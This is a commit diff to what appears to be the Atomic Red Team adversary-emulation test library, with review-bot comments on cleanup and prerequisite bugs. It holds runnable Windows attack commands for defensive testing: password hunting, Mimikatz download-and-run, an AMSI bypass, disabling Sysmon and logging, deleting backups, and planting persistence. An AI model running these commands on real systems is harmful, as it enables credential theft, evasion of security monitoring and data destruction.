Batch of improvements (#716)

* another batch of improvements

* delete duplicate test, extra cleaning pass
This commit is contained in:
Andrew Beers
2019-12-10 12:19:19 -06:00
committed by Carrie Roberts
parent 890099be35
commit 0c5bcef840
6 changed files with 39 additions and 95 deletions
+5 -18
@@ -31,18 +31,6 @@ atomic_tests:
command: |
grep -ri password #{file_path}
- name: Runs Mimikatz & Mimikittenz by name
description: |
Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
invoke-mimikittenz
mimikatz.exe
- name: Extracting passwords with findstr
description: |
Extracting Credentials from Files
@@ -54,17 +42,16 @@ atomic_tests:
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
- name: Access "unattend.xml"
- name: Access unattend.xml
description: |
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
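Review bot: Both new `type` lines send stdout and stderr to `nul`, so the command_prompt executor reports nothing about whether either unattend.xml path existed and the test completes identically on a host where neither file is present. That is acceptable if the goal is only to produce the file-read attempt that monitoring should record, but the description does not say so; add a line such as `Both paths are usually absent on a clean install; the test still generates the read attempt that file-access auditing should capture.` Dropping `cmd /c` is fine here since the executor already runs these lines in cmd.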
+2 -39
@@ -6,16 +6,13 @@ atomic_tests:
- name: Mimikatz
description: |
Download Mimikatz and dump credentials
supported_platforms:
- windows
input_arguments:
mimurl:
description: Mimikatz url
type: url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: command_prompt
elevation_required: true
@@ -25,16 +22,13 @@ atomic_tests:
- name: BloodHound
description: |
Download Bloodhound and run it
supported_platforms:
- windows
input_arguments:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
executor:
name: command_prompt
elevation_required: false
@@ -45,10 +39,8 @@ atomic_tests:
description: |
Different obfuscated methods to test
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
@@ -60,10 +52,8 @@ atomic_tests:
- name: Mimikatz - Cradlecraft PsSendKeys
description: |
Run mimikatz via PsSendKeys
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
@@ -73,12 +63,9 @@ atomic_tests:
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
@@ -88,10 +75,8 @@ atomic_tests:
- name: PowerShell Add User
description: |
Using PS 5.1, add a user via CLI
supported_platforms:
- windows
input_arguments:
user_name:
description: username to add
@@ -120,16 +105,13 @@ atomic_tests:
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -141,16 +123,13 @@ atomic_tests:
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -161,16 +140,13 @@ atomic_tests:
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
executor:
name: command_prompt
elevation_required: false
@@ -181,16 +157,13 @@ atomic_tests:
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
executor:
name: powershell
elevation_required: false
@@ -201,10 +174,8 @@ atomic_tests:
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
supported_platforms:
- windows
executor:
name: manual
steps: |
@@ -214,10 +185,8 @@ atomic_tests:
- name: PowerShell Fileless Script Execution
description: |
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
@@ -228,14 +197,12 @@ atomic_tests:
cleanup_command: |
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
- name: PowerShell Downgrade Attack
description: |
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
supported_platforms:
- windows
- windows
executor:
name: powershell
elevation_required: false
@@ -247,16 +214,13 @@ atomic_tests:
- name: NTFS Alternate Data Stream Access
description: |
Creates a file with an alternate data stream and simulates executing that hidden code/file
supported_platforms:
- windows
input_arguments:
ads_file:
description: File created to store Alternate Stream Data
type: String
default: $env:TEMP\NTFS_ADS.txt
executor:
name: powershell
elevation_required: false
@@ -268,4 +232,3 @@ atomic_tests:
Invoke-Expression $streamcommand
cleanup_command: |
Remove:Item #{ads_file}
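Review bot: The cleanup for the NTFS Alternate Data Stream test reads `Remove:Item #{ads_file}`, which is not a cmdlet name and will not resolve in PowerShell, so the cleanup fails and the ADS test file is left in `$env:TEMP` after every run; it should be `Remove-Item #{ads_file}`. The line appears as context in this hunk rather than as a change, but it is part of the new side and this pass was meant to clean the file up. The hunk for the PowerShell Downgrade Attack test also shows `- windows` twice; if that reflects a duplicate list entry rather than an old/new pair, one of them should go as well.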
+13 -14
@@ -98,7 +98,7 @@ atomic_tests:
- name: Unload Sysmon Filter Driver
description: |
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
supported_platforms:
- windows
input_arguments:
@@ -120,7 +120,7 @@ atomic_tests:
- name: Disable Windows IIS HTTP Logging
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
@@ -130,17 +130,19 @@ atomic_tests:
type: string
default: Default Web Site
executor:
name: command_prompt
name: powershell
prereq_command: |
if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
command: |
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
cleanup_command: |
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
- name: Uninstall Sysmon
description: |
Uninstall Sysinternals Sysmon for Defense Evasion
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
@@ -153,11 +155,10 @@ atomic_tests:
- name: AMSI Bypass - AMSI InitFailed
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
@@ -169,11 +170,9 @@ atomic_tests:
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
This test removes the Windows Defender provider registry key.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
@@ -184,7 +183,7 @@ atomic_tests:
- name: Disable Arbitrary Security Windows Service
description: |
With administrative rights, an adversary can disable Windows Services related to security products.
With administrative rights, an adversary can disable Windows Services related to security products.
supported_platforms:
- windows
input_arguments:
@@ -204,7 +203,7 @@ atomic_tests:
- name: Disable PowerShell Script Block Logging
description: |
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
@@ -225,7 +224,7 @@ atomic_tests:
- name: PowerShell Bypass of AntiMalware Scripting Interface
description: |
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
@@ -234,4 +233,4 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
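Review bot: The new `prereq_command` for the Disable Windows IIS HTTP Logging test, `if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}`, only writes 0 or 1 to the pipeline and returns a zero exit status in both branches; if the harness judges prerequisites by exit code, which is the usual `exit 0` / `exit 1` convention for these files, a missing appcmd.exe is still treated as satisfied. Suggest `if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit 0} else {exit 1}`. The same executor block shows no `elevation_required` entry in the hunk, although changing IIS logging configuration needs administrator rights; confirm it was not lost when the executor name was switched from command_prompt to powershell.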
+2 -1
@@ -8,7 +8,6 @@ atomic_tests:
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
supported_platforms:
- windows
input_arguments:
@@ -24,3 +23,5 @@ atomic_tests:
name: command_prompt
command: |
xcopy #{web_shells} #{web_shell_path}
cleanup_command: |
del #{web_shell_path}
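Review bot: The added cleanup `del #{web_shell_path}` lacks the `/Q` and `/F` switches that the other cmd cleanups in this commit use, so if `web_shell_path` names a directory `del` stops at an interactive `Are you sure (Y/N)?` prompt in an unattended run, and a read-only copy would be left behind either way. Use `del /Q /F #{web_shell_path}` to match the rest of the file set. The `input_arguments` that define `web_shell_path` are outside this hunk, so whether it is a file or a directory cannot be confirmed from here.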
+10 -20
@@ -55,48 +55,36 @@ atomic_tests:
Delete a single file from the temporary directory using cmd.exe
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd\a
executor:
name: command_prompt
elevation_required: false
command: |
del /f #{file_to_delete}
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
- name: Delete an entire folder - Windows cmd
description: |
Recursively delete the temporary directory and all files contained within it using cmd.exe
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd
executor:
name: command_prompt
elevation_required: false
command: |
del /f /S #{folder_to_delete}
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
- name: Delete a single file - Windows PowerShell
description: |
Delete a single file from the temporary directory using Powershell
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-ps\a
executor:
name: powershell
elevation_required: false
command: |
Remove-Item -path "#{file_to_delete}"
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
- name: Delete an entire folder - Windows PowerShell
description: |
@@ -112,7 +100,8 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
Remove-Item -path "#{folder_to_delete}" -recurse
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
- name: Delete VSS - vssadmin
description: |
@@ -143,13 +132,14 @@ atomic_tests:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: |
This test deletes Windows Backup catalogs.
This test deletes Windows Backup catalogs.
supported_platforms:
- windows
executor:
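Review bot: The rewritten PowerShell commands `New-Item $env:TEMP\T1107.txt` and `New-Item $env:TEMP\T1107 -ItemType Directory` fail when the target already exists, so a run interrupted before its `Remove-Item` line leaves every later run failing at the creation step; add `-Force` to both `New-Item` calls (the cmd variants are not affected, `echo >` overwrites and `mkdir` only reports an error and continues). Replacing the `file_to_delete` / `folder_to_delete` arguments with fixed `%temp%\T1107*` names is clearly the intent of the commit, but the descriptions still only say "from the temporary directory"; naming the fixture, e.g. `Creates and then deletes %temp%\T1107.txt`, would tell an analyst exactly which path the deletion event will reference.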
+7 -3
@@ -10,9 +10,11 @@ atomic_tests:
- windows
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: |
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
cleanup_command: |
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
- name: Modify Registry of Local Machine - cmd
description: |
@@ -25,6 +27,8 @@ atomic_tests:
elevation_required: true
command: |
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
cleanup_command: |
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
- name: Modify Registry of Another User Profile
description: |
@@ -90,7 +94,7 @@ atomic_tests:
- name: Modify registry to store logon credentials
description: |
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
supported_platforms:
- windows
executor:
@@ -129,4 +133,4 @@ atomic_tests:
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: |
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
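Review bot: The cleanup `Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}` repeats `-Path`, which PowerShell rejects as a missing argument for that parameter, so the stored encoded command is never removed from the registry after the test; it should read `Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage}`. The line is printed twice in the hunk with no visible textual difference, so the commit appears to have touched only whitespace and the duplicated switch predates it. Separately, the first hunk raises `elevation_required` to true for a write under `HKEY_CURRENT_USER`, which normally needs no administrator rights; if that was deliberate, a short note in the description would stop it being reverted as a mistake.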